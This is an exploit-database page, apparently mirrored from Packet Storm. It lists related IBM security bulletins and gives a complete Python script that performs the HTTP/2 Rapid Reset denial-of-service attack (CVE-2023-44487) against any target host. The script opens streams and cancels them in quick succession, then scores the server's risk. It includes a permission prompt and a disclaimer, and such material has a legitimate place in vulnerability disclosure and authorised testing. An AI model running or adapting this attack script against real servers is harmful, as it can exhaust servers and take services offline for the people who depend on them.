Lucene search
K

📄 HTTP/2 2.0 Denial of Service

🗓️ 03 Nov 2025 00:00:00Reported by Madhusudhan RajappaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 220 Views

This Python tool tests the HTTP/2 rapid reset vulnerability CVE-2023-44487.

Related
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins
Security Bulletin: There is a vulnerability in HTTP/2 protocol used by Netty on IBM Maximo Manage application in IBM Maximo Application Suite (CVE-2023-44487)
5 Apr 202415:08
ibm
IBM Security Bulletins
Security Bulletin: IBM MQ is vulnerable to issues in Eclipse (CVE-2023-4218, CVE-2023-44487)
29 Feb 202421:58
ibm
IBM Security Bulletins
Security Bulletin: IBM Operational Decision Manager November 2023 - Multiple CVEs addressed
15 Nov 202313:37
ibm
IBM Security Bulletins
Security Bulletin: Multiple vulnerabilities in IBM WebSphere Application Server Liberty affect IBM Storage Scale System
16 Sep 202418:20
ibm
IBM Security Bulletins
Security Bulletin: IBM Cognos Analytics is affected by multiple vulnerabilities
15 Apr 202503:05
ibm
IBM Security Bulletins
Security Bulletin: An Eclipse Jetty vulnerability affects IBM Rational Functional Tester
21 Dec 202317:17
ibm
IBM Security Bulletins
Security Bulletin: IBM Storage Protect is vulnerable to multiple attacks due to http2-server and http2-common (CVE-2023-44487)
15 Dec 202316:25
ibm
IBM Security Bulletins
Security Bulletin: IBM WebSphere Application Server Liberty, which is bundled with IBM Cloud Pak for Applications, is vulnerable to denial of service due to HTTP/2 Rapid Reset vulnerability (CVE-2023-44487)
15 Nov 202320:45
ibm
IBM Security Bulletins
Security Bulletin: IBM Planning Analytics Workspace is affected by vulnerabilities in multiple Open Source Software (OSS) components
28 Mar 202415:34
ibm
IBM Security Bulletins
Security Bulletin: IBM QRadar SIEM protocols are affected by denial of service.
15 Jul 202515:17
ibm
Rows per page
#!/usr/bin/env python3
    """
    # Exploit Title: HTTP/2 2.0 - Denial Of Service (DOS)
    # Google Dork: -NA-
    # Date: 29th August 2025
    # Exploit Author: Madhusudhan Rajappa
    # Vendor Homepage: -NA-
    # Software Link: -NA-
    # Version: HTTP/2.0
    # Tested on: -NA-
    # CVE : CVE-2023-44487
    """
    
    import asyncio
    import ssl
    import time
    import argparse
    import logging
    from typing import Optional, Tuple
    import statistics
    
    try:
        import h2.connection
        import h2.events
        import h2.exceptions
        import h2.config
    except ImportError:
        print("Error: h2 library not installed. Install with: pip install h2")
        exit(1)
    
    # Configure logging
    logging.basicConfig(
        level=logging.INFO,
        format='%(asctime)s - %(levelname)s - %(message)s'
    )
    logger = logging.getLogger(__name__)
    
    class HTTP2RapidResetTester:
        """Class to test for CVE-2023-44487 HTTP/2 Rapid Reset vulnerability."""
        
        def __init__(self, host: str, port: int = 443, use_ssl: bool = True):
            self.host = host
            self.port = port
            self.use_ssl = use_ssl
            self.connection = None
            self.reader = None
            self.writer = None
            self.response_times = []
            self.errors = []
            self.connection_closed = False
            
        async def connect(self) -> bool:
            """Establish HTTP/2 connection to the target server."""
            try:
                logger.info(f"Connecting to {self.host}:{self.port}")
                
                if self.use_ssl:
                    ssl_context = ssl.create_default_context()
                    ssl_context.set_alpn_protocols(['h2'])
                    self.reader, self.writer = await asyncio.open_connection(
                        self.host, self.port, ssl=ssl_context
                    )
                else:
                    self.reader, self.writer = await asyncio.open_connection(self.host, self.port)
                
                # Initialize HTTP/2 connection
                config = h2.config.H2Configuration(client_side=True)
                self.connection = h2.connection.H2Connection(config=config)
                self.connection.initiate_connection()
                
                # Send connection preface
                await self._send_data(self.connection.data_to_send())
                
                logger.info("HTTP/2 connection established successfully")
                self.connection_closed = False
                return True
                
            except Exception as e:
                logger.error(f"Failed to establish connection: {e}")
                return False
        
        async def _send_data(self, data: bytes):
            """Send data to the server."""
            if data and self.writer and not self.connection_closed:
                try:
                    self.writer.write(data)
                    await self.writer.drain()
                except (ConnectionResetError, BrokenPipeError, OSError) as e:
                    logger.debug(f"Connection error while sending data: {e}")
                    self.connection_closed = True
        
        async def _receive_data(self) -> bytes:
            """Receive data from the server."""
            try:
                if self.connection_closed or not self.reader:
                    return b''
                data = await asyncio.wait_for(self.reader.read(65535), timeout=5.0)
                if not data:
                    self.connection_closed = True
                return data
            except asyncio.TimeoutError:
                return b''
            except (ConnectionResetError, BrokenPipeError, OSError) as e:
                logger.debug(f"Connection error while receiving data: {e}")
                self.connection_closed = True
                return b''
        
        async def rapid_reset_test(self, num_streams: int = 100, delay: float = 0.001) -> dict:
            """
            Perform the rapid reset attack test.
            
            Args:
                num_streams: Number of streams to create and reset
                delay: Delay between stream creations (seconds)
            
            Returns:
                Dictionary with test results
            """
            logger.info(f"Starting rapid reset test with {num_streams} streams")
            
            start_time = time.time()
            created_streams = []
            reset_streams = []
            
            try:
                # Phase 1: Rapidly create streams
                for i in range(num_streams):
                    if self.connection_closed:
                        logger.warning("Connection closed during stream creation")
                        break
                        
                    stream_id = (i * 2) + 1  # Odd numbers for client-initiated streams
                    
                    # Create HTTP/2 headers
                    headers = [
                        (':method', 'GET'),
                        (':path', '/'),
                        (':scheme', 'https' if self.use_ssl else 'http'),
                        (':authority', self.host),
                        ('user-agent', 'CVE-2023-44487-Tester/1.0'),
                    ]
                    
                    try:
                        # Send headers to create stream
                        self.connection.send_headers(stream_id, headers)
                        await self._send_data(self.connection.data_to_send())
                        created_streams.append(stream_id)
                        
                        # Small delay to avoid overwhelming the connection
                        if delay > 0:
                            await asyncio.sleep(delay)
                            
                    except Exception as e:
                        self.errors.append(f"Error creating stream {stream_id}: {e}")
                        if "connection" in str(e).lower():
                            break
                
                logger.info(f"Created {len(created_streams)} streams")
                
                # Phase 2: Rapidly reset all streams
                reset_start = time.time()
                for stream_id in created_streams:
                    if self.connection_closed:
                        logger.warning("Connection closed during stream reset")
                        break
                        
                    try:
                        # Send RST_STREAM frame to cancel the request
                        self.connection.reset_stream(stream_id, error_code=0x8)  # CANCEL error code
                        await self._send_data(self.connection.data_to_send())
                        reset_streams.append(stream_id)
                        
                        if delay > 0:
                            await asyncio.sleep(delay / 10)  # Faster resets
                            
                    except h2.exceptions.StreamClosedError:
                        # Stream already closed, continue
                        pass
                    except Exception as e:
                        self.errors.append(f"Error resetting stream {stream_id}: {e}")
                        if "connection" in str(e).lower():
                            break
                
                reset_duration = time.time() - reset_start
                total_duration = time.time() - start_time
                
                logger.info(f"Reset {len(reset_streams)} streams in {reset_duration:.3f}s")
                
                # Phase 3: Monitor server response
                await self._monitor_server_response(timeout=10.0)
                
                return {
                    'streams_created': len(created_streams),
                    'streams_reset': len(reset_streams),
                    'total_duration': total_duration,
                    'reset_duration': reset_duration,
                    'reset_rate': len(reset_streams) / reset_duration if reset_duration > 0 else 0,
                    'errors': len(self.errors),
                    'response_times': self.response_times.copy(),
                    'avg_response_time': statistics.mean(self.response_times) if self.response_times else 0,
                    'connection_closed': self.connection_closed
                }
                
            except Exception as e:
                logger.error(f"Error during rapid reset test: {e}")
                return {'error': str(e)}
        
        async def _monitor_server_response(self, timeout: float = 10.0):
            """Monitor server responses and measure response times."""
            logger.info("Monitoring server responses...")
            
            end_time = time.time() + timeout
            
            while time.time() < end_time and not self.connection_closed:
                try:
                    start = time.time()
                    data = await self._receive_data()
                    response_time = time.time() - start
                    
                    if data:
                        self.response_times.append(response_time)
                        
                        try:
                            # Process HTTP/2 events
                            events = self.connection.receive_data(data)
                            for event in events:
                                if isinstance(event, h2.events.ResponseReceived):
                                    logger.debug(f"Response received on stream {event.stream_id}")
                                elif isinstance(event, h2.events.StreamReset):
                                    logger.debug(f"Stream {event.stream_id} reset by server")
                                elif isinstance(event, h2.events.ConnectionTerminated):
                                    logger.warning("Server terminated connection")
                                    self.connection_closed = True
                                    return
                        except Exception as e:
                            logger.debug(f"Error processing HTTP/2 events: {e}")
                    
                    await asyncio.sleep(0.1)
                    
                except Exception as e:
                    self.errors.append(f"Error monitoring response: {e}")
                    break
        
        async def baseline_test(self, num_requests: int = 10) -> dict:
            """Perform baseline test with normal HTTP/2 requests."""
            logger.info(f"Performing baseline test with {num_requests} normal requests")
            
            start_time = time.time()
            successful_requests = 0
            
            for i in range(num_requests):
                if self.connection_closed:
                    logger.warning("Connection closed during baseline test")
                    break
                    
                stream_id = (i * 2) + 1
                
                headers = [
                    (':method', 'GET'),
                    (':path', '/'),
                    (':scheme', 'https' if self.use_ssl else 'http'),
                    (':authority', self.host),
                    ('user-agent', 'CVE-2023-44487-Baseline/1.0'),
                ]
                
                try:
                    request_start = time.time()
                    self.connection.send_headers(stream_id, headers)
                    self.connection.end_stream(stream_id)
                    await self._send_data(self.connection.data_to_send())
                    
                    # Wait for response
                    try:
                        data = await asyncio.wait_for(self._receive_data(), timeout=5.0)
                        if data:
                            self.response_times.append(time.time() - request_start)
                            successful_requests += 1
                    except asyncio.TimeoutError:
                        logger.warning(f"Timeout waiting for response to request {i+1}")
                    
                    await asyncio.sleep(0.1)  # Small delay between requests
                    
                except Exception as e:
                    logger.warning(f"Error in baseline request {i+1}: {e}")
                    if "connection" in str(e).lower():
                        break
            
            total_duration = time.time() - start_time
            
            return {
                'total_requests': num_requests,
                'successful_requests': successful_requests,
                'total_duration': total_duration,
                'avg_response_time': statistics.mean(self.response_times) if self.response_times else 0,
                'success_rate': successful_requests / num_requests if num_requests > 0 else 0
            }
        
        async def close(self):
            """Close the connection gracefully."""
            if self.writer and not self.connection_closed:
                try:
                    # Try to close the connection gracefully
                    if self.connection:
                        try:
                            # Send GOAWAY frame if possible
                            self.connection.close_connection()
                            await self._send_data(self.connection.data_to_send())
                        except Exception as e:
                            logger.debug(f"Error sending GOAWAY frame: {e}")
                    
                    # Close the writer
                    self.writer.close()
                    
                    # Wait for close with timeout to avoid hanging
                    try:
                        await asyncio.wait_for(self.writer.wait_closed(), timeout=2.0)
                    except asyncio.TimeoutError:
                        logger.debug("Timeout waiting for connection to close")
                    except (ConnectionResetError, BrokenPipeError, OSError):
                        # Connection already closed by peer, this is expected
                        pass
                        
                except Exception as e:
                    logger.debug(f"Error during connection cleanup: {e}")
                finally:
                    self.connection_closed = True
    
    async def main():
        parser = argparse.ArgumentParser(
            description='CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester',
            epilog='WARNING: Only use on systems you own or have permission to test!'
        )
        parser.add_argument('host', help='Target hostname')
        parser.add_argument('-p', '--port', type=int, default=443, help='Target port (default: 443)')
        parser.add_argument('--no-ssl', action='store_true', help='Disable SSL/TLS')
        parser.add_argument('-s', '--streams', type=int, default=100, 
                           help='Number of streams for rapid reset test (default: 100)')
        parser.add_argument('-d', '--delay', type=float, default=0.001,
                           help='Delay between stream operations (default: 0.001s)')
        parser.add_argument('--baseline-only', action='store_true',
                           help='Only perform baseline test')
        parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output')
        
        args = parser.parse_args()
        
        if args.verbose:
            logging.getLogger().setLevel(logging.DEBUG)
        
        print("=" * 60)
        print("CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester")
        print("=" * 60)
        print(f"Target: {args.host}:{args.port}")
        print(f"SSL: {'Enabled' if not args.no_ssl else 'Disabled'}")
        print()
        
        # Legal disclaimer
        print("LEGAL DISCLAIMER:")
        print("This tool is for authorized security testing only.")
        print("Ensure you have permission to test the target system.")
        print("Unauthorized use may be illegal.")
        print()
        
        response = input("Do you have permission to test this system? (yes/no): ")
        if response.lower() != 'yes':
            print("Exiting. Only use this tool on systems you're authorized to test.")
            return
        
        tester = HTTP2RapidResetTester(args.host, args.port, not args.no_ssl)
        
        try:
            # Connect to target
            if not await tester.connect():
                logger.error("Failed to establish connection. Exiting.")
                return
            
            # Perform baseline test
            print("\n" + "="*40)
            print("BASELINE TEST")
            print("="*40)
            baseline_results = await tester.baseline_test()
            
            print(f"Baseline Results:")
            print(f"  Total Requests: {baseline_results['total_requests']}")
            print(f"  Successful: {baseline_results['successful_requests']}")
            print(f"  Success Rate: {baseline_results['success_rate']:.2%}")
            print(f"  Avg Response Time: {baseline_results['avg_response_time']:.3f}s")
            print(f"  Total Duration: {baseline_results['total_duration']:.3f}s")
            
            if not args.baseline_only:
                # Reset connection for rapid reset test
                await tester.close()
                tester = HTTP2RapidResetTester(args.host, args.port, not args.no_ssl)
                
                if not await tester.connect():
                    logger.error("Failed to re-establish connection for rapid reset test.")
                    return
                
                # Perform rapid reset test
                print("\n" + "="*40)
                print("RAPID RESET TEST (CVE-2023-44487)")
                print("="*40)
                print(f"Testing with {args.streams} streams...")
                
                rapid_results = await tester.rapid_reset_test(args.streams, args.delay)
                
                if 'error' in rapid_results:
                    print(f"Test failed: {rapid_results['error']}")
                else:
                    print(f"Rapid Reset Results:")
                    print(f"  Streams Created: {rapid_results['streams_created']}")
                    print(f"  Streams Reset: {rapid_results['streams_reset']}")
                    print(f"  Reset Rate: {rapid_results['reset_rate']:.1f} resets/second")
                    print(f"  Total Duration: {rapid_results['total_duration']:.3f}s")
                    print(f"  Reset Duration: {rapid_results['reset_duration']:.3f}s")
                    print(f"  Errors: {rapid_results['errors']}")
                    print(f"  Avg Response Time: {rapid_results['avg_response_time']:.3f}s")
                    
                    if rapid_results.get('connection_closed'):
                        print(f"  Connection Status: Server closed connection during test")
                    
                    # Analysis
                    print("\n" + "="*40)
                    print("VULNERABILITY ANALYSIS")
                    print("="*40)
                    
                    if rapid_results.get('connection_closed'):
                        print("Server closed connection during rapid reset test")
                        print("   This could indicate protective measures or resource exhaustion.")
                    
                    if rapid_results['streams_reset'] < rapid_results['streams_created'] * 0.8:
                        print("WARNING: Server may have rejected many reset requests")
                        print("   This could indicate protective measures are in place.")
                    
                    if rapid_results['reset_rate'] > 1000:
                        print("HIGH RISK: Server accepts very high reset rates")
                        print("   This may indicate vulnerability to CVE-2023-44487")
                    
                    elif rapid_results['reset_rate'] > 100:
                        print("MEDIUM RISK: Server accepts moderate reset rates")
                        print("   Further testing may be needed")
                    
                    else:
                        print("LOWER RISK: Server has rate limiting on resets")
                        print("   This suggests some protection against the vulnerability")
                    
                    if len(tester.errors) > rapid_results['streams_created'] * 0.1:
                        print("Many errors occurred during testing")
                        print("   Results may not be reliable")
            
        except KeyboardInterrupt:
            print("\nTest interrupted by user")
        except Exception as e:
            logger.error(f"Unexpected error: {e}")
        finally:
            try:
                await tester.close()
            except Exception as e:
                logger.debug(f"Error during final cleanup: {e}")
            print("\nTest completed.")
    
    if __name__ == "__main__":
        print("CVE-2023-44487 HTTP/2 Rapid Reset Vulnerability Tester")
        print("Requires: pip install h2")
        print()
        
        try:
            asyncio.run(main())
        except KeyboardInterrupt:
            print("\nExiting...")
        except Exception as e:
            logger.error(f"Fatal error: {e}")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Nov 2025 00:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.17.5
EPSS0.944
220